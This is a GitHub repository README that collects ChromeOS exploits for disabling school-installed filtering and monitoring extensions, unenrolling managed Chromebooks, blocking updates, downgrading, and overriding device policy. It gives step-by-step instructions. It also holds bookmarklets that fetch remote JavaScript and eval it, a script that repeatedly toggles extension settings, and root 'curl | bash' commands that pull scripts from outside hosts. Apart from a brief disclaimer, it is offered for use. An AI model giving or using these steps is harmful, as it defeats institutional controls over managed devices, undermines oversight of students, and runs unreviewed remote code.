Skip to content

akabutnicer/ext-remover

BranchesTags
ย 
ย 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

ย 

History

240 Commits
.github
.github
ย 
ย 
img
img
ย 
ย 
Dextensify.html
Dextensify.html
ย 
ย 
LICENCE
LICENCE
ย 
ย 
README.md
README.md
ย 
ย 
bookmark.js
bookmark.js
ย 
ย 
exploit.js
exploit.js
ย 
ย 
ext-launcher-bookmarklet.js
ext-launcher-bookmarklet.js
ย 
ย 
filtersessionbypass.txt
filtersessionbypass.txt
ย 
ย 
gui.js
gui.js
ย 
ย 
launcher.js
launcher.js
ย 
ย 
newpointblank.js
newpointblank.js
ย 
ย 
ublockExec.js
ublockExec.js
ย 
ย 
uboss.js
uboss.js
ย 
ย 

Repository files navigation

EXT-REMOVER

This is a curated list of exploits for ChromeOS. It started with LTBEEF, and now there is more! Many of these exploits can destroy your computer if misused. So PLEASE, PLEASE make sure you follow these instructions very carefully!

Need help? Ask for help here!

Please use these only when you have permission, I (3kh0) do not condone the use of any exploits for illegal purposes!

Image Credit: LittleMissNyan

Thank you to all of the contributors! Yall really are pretty epic :D

Table of contents generated with readme-toc

Skiovox Unrestricted browsing

What is it?

An exploit that allows for browsing within a completely unblocked Chrome browser. It works on ChromeOS 118 and a wide range of previous versions.

  • Skiovox utilizes a bug in kiosk apps
  • Very similar to a bug from 3 years ago Within the unblocked browser, you can
  • Install extensions
  • Bypass pretty much all blocks
  • Do whatever the honk you want

How to use it

Bypassi made a wonderful slideshow for you goof balls to follow, view using any of the links below!

Further Reading

๐Ÿ”ผ Back to top

LTBEEF Disable extensions

LTBEEF (Literally The Best Exploit Ever Found) is a exploit found by Bypassi (Bypassi#7037) in September 2022, and is a great way to disable spyware that was installed on your chromebook by your school.

How to use LTBEEF

Use either of the two bookmarklets below, the instructions are the same for both.

  1. Copy the Javascript code from either of the two bookmarklets below
  2. Make a new bookmark on your chromebook
  3. Put the Javascript code in the URL section of the bookmark
  4. Visit https://chrome.google.com/webstorex. (This is a 404 page, and that is ok.)
  5. If that page does not work, you can just change the end of the URL to anything else, like https://chrome.google.com/webstoreYAAAAAAAAAAAAAAAY
  6. Click on the bookmark you made
  7. Switch off the extentions you don't want to have anymore.
  8. You're done! The extention should now be disabled.

Please note that this exploit has been patched for quite some time

Bookmarklets

CompactCow GUI

compactcowgui

javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});

Ingot

ingot

javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())

๐Ÿ”ผ Back to top

LTMEAT Disable extensions

Literally The Meatiest Exploit of All Time

  1. Find a page belonging to the extension you want to disable. chrome://extensions, chrome://extensions-internals, and chrome://process-internals are all good places to find your extension's ID (a 32-character lowercase string). You can also do a simple Google search. Once you have your ID, substitute it into the hostname in the URL below:
chrome-extension://extensionidhereblahblah/manifest.json

For some filters like Securly, the block screen is already an extension page.

  1. Bookmark the extension page (bookmark A) if you wish. Then, bookmark chrome://kill (B) and chrome://hang (C).
  2. On the extension page (A), click the chrome://kill bookmark (B). The page should crash. You should already have the next step prepared.
  3. Instantly start spamming chrome://hang (bookmark C) and quickly reload the page while spamming (ideally with the refresh key on your keyboard or ctrl+R). You should have reloaded within one or two seconds of killing the page.
  4. If the extension page (bookmark A) no longer loads, then LTMEAT worked! You can close your tabs, and the extension will be dead. If nothing loads, you probably reloaded too late or spammed too slowly. This isn't rocket science! Restart your computer to revert back to normal.

Exploit made by Bypassi#7037, learn why this works.

"Help me! I'm an idiot!"

I had far too much faith in society when making this page. Some of you skids out there are really, really stupid and also can't read. So here are the answers to some commonly asked questions.

How do I get an extension ID?

Okay, fair. Extension IDs are leaked in a couple of places. Generally, the best way to get them is to go to extension settings and copy the URL query value.

It says blocked by client?

That's the message you get when you try to visit a page belonging to an extension that doesn't exist. The error message (ERR_BLOCKED_BY_CLIENT) is highly misleading. Nobody blocked it. You need to find the correct extension ID (see above).

If you got this because you tried to visit the extension_id_here example URL, you should be extremely ashamed of yourself. Please change and grow as a person.

I don't have a bookmarks bar!!!!

First, try running ctrl+shift+B. If that doesn't work, go to chrome://settings and turn on the "home button" feature, then set it to chrome://hang. A home icon should appear to the right of your refresh icon in the top left. Use that instead of bookmark C.

There is a version where you don't need bookmarklets, but I am currently gatekeeping it (L). Check this site daily to see if new alternate instructions have been posted.

I disabled an extension, but now I can't load websites!

If you just read the write-up, you'd know that this would happen if the extension's background page loaded and its listeners were already initialized before you used chrome://hang. You can double-check whether the extension is listening using chrome://extensions-internals, assuming you have a few brain cells in your head.

Anyway, no listeners mean you were too slow. Either you waited more than three seconds between bookmark B and reloading the page, or you needed to be spamming bookmark C faster. The most reliable fix is to restart your computer and try again. Try to match the pace of the gif below: (note the reload)

image

The bookmarks don't do anything when I click them!

Might be admin-blocked. Either be smart enough to figure out another way or check this site daily to see if new alternate instructions have been posted.

I disabled the extension. Why is some stuff still blocked?

I have bad news for you... not all filters are Chrome Extensions. Again, make sure the extension pages (like bookmark A) are frozen before you assume that your skiddy self successfully did the exploit.

Baby method for slow people

๐Ÿ”ผ Back to top

Temp TMEAT Disable extensions

A method of using LTMEAT that does not require chrome:// urls. This works by using 80-150 tabs to soak up memory.

  1. Create a bookmark with the link chrome://extensions/?id=extension_id_here and name it Kill switch.
  2. Create a new bookmark folder. Name it spam.js. Next, paste this link into your browser: chrome-extension://extension_id_here/background.js
  3. Then right-click on your folder and hit Add Page. Press Enter.
  4. Right-click on the folder again and hit Bookmark Manager. You should see your page. Click on it and hit Ctrl+C. Press Ctrl+V until you have 38 of them.
  5. Go to a new tab and right-click your folder. Press Open All (38).
  6. Repeat step 3, then click on one of the tabs from this batch. Wait until the This page is taking too long popup appears. This will take 30-60 seconds. If it doesnโ€™t, do chrome://restart and go back to step 2 and add 3-4 more pages to the folder.
  7. Once the popup happens, right-click on one of the tabs closest to the right of the screen and hit Duplicate. Then, go to your Kill switch bookmark and look for a switch to flip, Allow Access to File:// urls. Then, click on the leftmost extension tab (one that opened from the main.js folder) and click Close all tabs to the right. KEEP THIS TAB OPEN!!!

Tips: Go to chrome://settings/performance and turn Memory Saver off, and in the box where it says Keep these sites always active, paste in the extension URL. Iโ€™ve noticed clicking on one of the tabs from the second batch seems to help with reliability.

๐Ÿ”ผ Back to top

Baby LTMEAT Disable extensions

BABY METHOD FOR THE TECHNOLOGICALLY CHALLENGED.

  1. Follow step one of the original instructions to find a page belonging to the Chrome extension you want to disable.
  2. Visit that chrome-extension://extension_id_here page, then type chrome://hang in the URL bar of that tab. It should start loading infinitely.
  3. Right-click the tab and duplicate it. Don't close anything.
  4. Go to the chrome://extensions page for the blocker extension you want to Disable.
  5. If that page has any switch, such as Allow access to file URLs, click that switch. If you don't see any clickable switches, this exploit will not work
  6. The extension should now be broken, assuming you clicked the switch! Only one of the two duplicate tabs should be left standing. You can close your tabs now.

๐Ÿ”ผ Back to top

LTMEAT Print Disable extensions

  1. Find your extension's largest file. This can usually be found by using Rob Wu's crxviewer
  2. Go to that page and run Ctrl+P. A print window should show up, with several pages in the top right.
  3. Do everything you can to increase that number. Shrink down margins, change layout to landscape, anything you can. The higher you get that number, the longer the effect will last.
  4. Reload. The page should start hanging.
  5. Go to your extension's settings page, chrome://extensions.
  6. Duplicate your "printing" tab, and go back to your extension's settings page.
  7. Flip any switch you can find there. Usually, there'll be one titled Allow access to file URLs.

Where do I find my extension's manifest.json?

First, find your extension's ID. This is a 32-character code found on your extension's settings page, normally near or at the top.

Where do I find my extension ID

Then go to chrome-extension://extension_id_here/manifest.json

Credit to Bypassi for the original LTMEAT framework, and to Swordmaster4321 for discovering that pages can be hung with printing.

๐Ÿ”ผ Back to top

Dextensify Disable extensions

Dextensify is an exploit that lets you disable most admin-installed Chrome extensions from any webpage. It can be used from regular websites, HTML files, and data URLs.

Go here and follow instructions: Dextensify Main HTML, or download the file here Dextensify.html

Download mirror: ftp.3kh0.net

Made by ading2210

๐Ÿ”ผ Back to top

JPCMG LTBEEF w/ Service workers

Requirements

  • chrome://serviceworker-internals
  • Inspect element
  1. Go to chrome://serviceworker-internals
  2. Find your extension, this exploit will not work if you can't find it. Some extensions will not work with this exploit.
  3. Hit the start button then the Inspect button, and execute LTBEEF code
chrome.management.setEnabled('extension_id_here',false)

Screenshot example

Thanks to Nyaann#3881 for this exploit

๐Ÿ”ผ Back to top

Corkey Corrupt extensions

  1. Esc+Refresh+Power and re-enroll (Enter recovery page), or you can just powerwash.
  2. Log into your Chromebook and immediately turn off WiFi and do refresh+power to (instant restart)
  3. Log back into your Chromebook with the WiFi off. Look for a option to login as a existing user and click that.
  4. Go to chrome://extensions, turn on WiFi, and wait for your school's blocking extension to appear.
  5. As soon as it appears, turn off WiFi and instant restart as fast as you can.
  6. Log back in, go back to extensions, and wait. If it says your blocking extension could be corrupted or doesn't appear at all, then it worked (wait at least a minute with a close watch in case it comes back)
  7. If it didn't work, start over. You have to be fast.

๐Ÿ”ผ Back to top

Extension Launcher Install extensions w/o allowlist

A bookmarklet capable of installing extensions, for those without an allowlist.

Requirements

  1. Access to the Chrome Web Store
  2. A Chromebook without allowlist
  3. Bookmarklets enabled

Instructions

  1. Go to ext-launcher-bookmarklet.js and save the code as a bookmarklet.
  2. Go to The Chrome Webstore and use the bookmarklet
  3. Then put the icon of the extension, the id, and the name of it (This does not matter, you can put anything), then press download, and it will work.

Extra Notes

  • Credit to "Aka, but nice" on Discord.
  • DNS will be up soon for those who have JavaScript bookmarklets blocked.
  • This will not work if you have a blocklist this is only for if when you go to the web store it shows blocked

๐Ÿ”ผ Back to top

Point-Blank Execute scripts on extension pages

This exploit allows you to execute scripts on extension pages, this is a great example of how Chromebooks are a piece of garbage.

Requirements

  1. Bookmarklets enabled
  2. Access to a working brain

Getting started

  1. Go to newpointblank.js and save the code as a bookmarklet on your Chromebook.
  2. Now find your blocker from the list below.

Blockers

Securly

Go to this page

If it says blocked by Chrome, reload (you have to actually have Securly ofc)

iBoss

Go to this page

Cisco Umbrella

Go to this page

Blocksi

Go to this page

GoGuardian

Go to this page

If your school updated GoGuardian, this exploit may not work.

Extra Notes

  • Now most of these links are a block page (this is intentional)
  • Each page should have a blue link, click the link on the page if it opens a blank page click the bookmarklet that you just made
  • Click either hard disable or soft disable, soft disable will only disable it until you restart your Chromebook.
  • You can also run some of the scripts and run your own code, your extension may disable javascript running on it, so running your own code may not work.
  • I recommend doing soft disable, which only disables it until restart.
  • The idea was from Bypassi#7037

๐Ÿ”ผ Back to top

UBoss Tamper with IBoss

This works only for iBoss, and Blocksi, If you don't have one of these, use New Point Blank.

Requirements

  • Bookmarklets enabled
  • Access to a working brain

Getting started

  1. Go to the corresponding link for your blocker below.

iBoss: tinyurl.com/byeswamp

Blocksi: tinyurl.com/blockboss

Then bookmark the code below:

javascript:opener.eval(`fetch("https://rounded-boiling-flax.glitch.me/uboss.js").then(data=>{data.text().then(e=>{eval(e)})})`) && close();
  1. Then go to the site with your blocker that was listed above.
  2. Run the code. Follow the instructions there.

If it doesn't work let us know by creating a discussion, this was made in partnership with akabutnice and bypassi.

๐Ÿ”ผ Back to top

CAUB Prevent Updates

This exploit keeps your Chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by Catakang#0987. Using onc files, you can convince your Chromebook that the WiFi that you're connected to is pay-to-use (like a hotspot using data), and thus it will not check for updates.

Requirements

  • Access to chrome://network#state

Getting started

  1. Go to chrome://network#state.
  2. Scroll to the bottom of the page. You will see a list of WiFi that you have connected to before.
  3. Click the + sign next to the WiFi name of each network that you commonly connect your Chromebook to.
  4. We are going to make it when the Chromebook is connected to those networks, it will not check for updates.
  5. Use ctrl+a and ctrl+c to copy all the text on the entire network#state page.
  6. Go to caub.glitch.me.
  7. Paste the copied text into the textbox below.
  8. Press the generate onc button below the textbox.
  9. Once you have downloaded the file, go to chrome://network#general.
  10. Click on the import ONC button.
  11. Import the newly-downloaded file.

Extra notes

  • Your Chromebook will no longer automatically update. (as long as you are on a wifi that you CAUBed)
  • Be careful not to stay on wifi for too long without using CAUB on it, otherwise, you might update.
  • We cannot guarantee that this will work on every wifi, but it should work on most.

๐Ÿ”ผ Back to top

CAUB Flags Prevent Updates

This alt exploit keeps your Chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by MechaXYZ. Using a Chrome flag, you can convince your Chromebook not to automatically update.

Requirements

  • Access to chrome://flags

Getting started

  1. Go to chrome://flags#show-metered-toggle or search "metered" in chrome://flags instead.
  2. Enable it and restart your device.
  3. Open the Settings app.
  4. Go to your Network >> Advanced >> Show metered toggle and turn it on

Extra notes

  • Your Chromebook will no longer automatically update. (as long as you have the flag enabled)
  • And you must be able to enable flags if it ain't blocked otherwise, this exploit won't work

๐Ÿ”ผ Back to top

Blank3r

Blank3r is an exploit that allows you to run bookmarklets on privileged pages, such as the Chrome extensions page. This exploit was made with Point Blank as well.

Requirements

  • Bookmarklets enabled

Getting started

  1. Bookmark this code:
javascript:let shim = false;var ids = prompt("extension ids (comma separated)").split(",");setInterval(()=>{ids.forEach((id)=> opener.chrome.developerPrivate.updateExtensionConfiguration({extensionId: id, fileAccess: shim}));shim = !shim;}, 145);
  1. Navigate to chrome://extensions.
  2. Click on an extension that YOU installed from the Chrome Web Store > Details.
  3. In the URL bar, copy the string of letters and numbers after the /?id=.
  4. Click "View in Chrome Web Store" and spam the escape key. If it loads into Chrome Webstore try again, if it is a blank screen click the bookmarklet.
  5. Paste the ID of the extension into the prompt separated by commas.

If you close the tab, the exploit will stop working.

๐Ÿ”ผ Back to top

sh1mmer Unenrollment

SH1MMER is an exploit capable of completely unenrolling enterprise-managed Chromebooks. It was found by the Mercury Workshop team and was released on January, Friday the 13th, 2023.

Due to the detail this exploit requires, please check out the offical website: sh1mmer.me

Further Reading

๐Ÿ”ผ Back to top

Downgrading Change versions

Downgrading can be used for several exploits, to get to a version that does not have patches for certain exploits, such as LTBEEF. This is a built-in feature of ChromeOS.

Please do note that recently, they have patched downgrading on most devices up to a certain version., so this may not work for you.

Requirements

  • A USB thumb drive with at least 4GB of storage, some boards have small or bigger images, I recommend 16GB
  • A personal computer with access to downloading extensions

Setup

  1. Navigate to chrome://version on the Chromebook you wish to downgrade and check for your board under Platform. For me, that would be octopus.

chrome://version

  1. Navigate to chrome100.dev , press ctrl+f and type in your board.
  2. Find and download the Chrome version you want to your personal computer.

Downgrading

  1. Install Chromebook Recovery Utility onto your personal computer.
  2. Open the extension, click on the settings button in the top right-hand corner, and click "Use local image".
  3. Select the recovery image you downloaded from chrome100.
  4. Plug in the USB you wish to use, and follow the prompts on the screen.
  5. On your Chromebook, press esc+reload+power and follow the prompts.
  6. On the checking for updates screen, press ctrl+shift+e to skip the "checking for updates" screen.

๐Ÿ”ผ Back to top

Pollen Policy Editor

chromeOS User Policy Editor

Requirements

  • Devmode NEEDS to be enabled.

Getting started

There are two modes for this, I recommend just using the first one.

Normal

  1. Open Crosh (Ctrl+Alt+T)
  2. Run the following commands:
shell
sudo su
curl -Ls https://mercuryworkshop.github.io/Pollen/Pollen.sh | bash
  1. Done! It may take a few seconds for the new policy to apply. If it does not apply, press alt+vol_up+x.

PollenFS (RootFS)

Disabling RootFS will Soft-Brick your Chromebook when booting back into normal mode.

  1. Open Crosh (Ctrl+Alt+T)
  2. Run the following commands:
shell
sudo su
curl -Ls https://mercuryworkshop.github.io/Pollen/RootFS.sh | bash
  1. Reboot
  2. Go Through Steps 1-3 Again
  3. Run the following command:
curl -Ls https://mercuryworkshop.github.io/Pollen/PollenFS.sh | bash
  1. Done! Your Pollen configuration is now permanently applied!

Further Reading

๐Ÿ”ผ Back to top

Killcurly Break extensions

Kill the extension by signing out.

  1. Visit chrome://settings/signOut.
  2. Press the big blue button.
  3. Go to chrome://restart
  4. Now visit tinyurl.com/AddSession or this link
  5. Add your SCHOOL account back. It WILL NOT WORK if you add a home account back. This is just so you can still access Google Drive, YouTube, and any Google service.
  6. All extensions should stop working.
  7. Note that you must repeat this every time you restart or sign out.
  8. If your Chrome version is v112 or above, this exploit will no longer work, the bypass to this is listed further on.

Credit to Zoroark

๐Ÿ”ผ Back to top

Shimboot Boot Linux

Shimboot is a collection of scripts for patching a Chrome OS RMA shim to serve as a bootloader for a standard Linux distribution. It allows you to boot a full desktop Debian install on a Chromebook, without needing to unenroll it or modify the firmware.

For more detailed information, please see the project's README.

Credit to vk6 for this exploit

Further reading

๐Ÿ”ผ Back to top

uBlock Run Run Code On Pages

If your school allows the uBlock Origin chrome extension, then running any bookmarklet is possible.

Requirements

  • uBlock Origin

Getting started

  1. Make sure you have uBlock Origin installed.

  2. Go to the extension's settings

  3. Under the settings tab, check the "I am an advanced user" box, then click on the small cog icon.

  4. Find userResourcesLocation and change it from unset to https://raw.githubusercontent.com/3kh0/ext-remover/main/ublockExec.js

  5. Goe My filters tab of the settings and add the following line:

*##+js(execute_script.js)
  1. Now press ctr+alt+tilde (~) to run code on the current page
  2. Have fun!

๐Ÿ”ผ Back to top

Quick View Bypass extensions

QuickView is a universal webview exploit in Chrome OS that utilizes the QuickOffice component extension. This exploit lets you create login windows with arbitrary URLs, thus allowing you to load pages without any extensions.

Go to quickview-exploit.pages.dev and follow the instructions

Please note that you need to be able to run bookmarklets for this exploit to work.

Further reading

๐Ÿ”ผ Back to top

Buypass Bypass extensions

What it can and can't do

  • This only lasts for 3 minutes!
  • Pages visited in this window will not be saved to your history, but their cookies will be saved.
  • You can right-click on the window to go back and forward.
  • There's no good way to make the text in the window larger.
  • This won't bypass network filters.
  • You can't log into non-school accounts.
  • It's completely possible that some filters could read and block the data sent within the window.

Getting started

Visit any of the links below:

Further reading

๐Ÿ”ผ Back to top

Chaos Hapara bypass

Devtools must not be blocked by policy to perform this exploit.

Go to this link and follow instructions

Further Reading:

๐Ÿ”ผ Back to top

SOT Exploit

  1. Download this extension One Tab
  2. Click the import button in the settings tab.
  3. Copy-paste the URL you wish to visit about 100 times, and then click import.
  4. Spam click the top link, then either spam escape on one of them or wait for one to load on a about:blank page.

Credit to Coding4Hours

๐Ÿ”ผ Back to top

About

A collection of ChromeOS exploits free for the public

3kh0.github.io/ext-remover/

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • JavaScript 70.5%
  • HTML 29.5%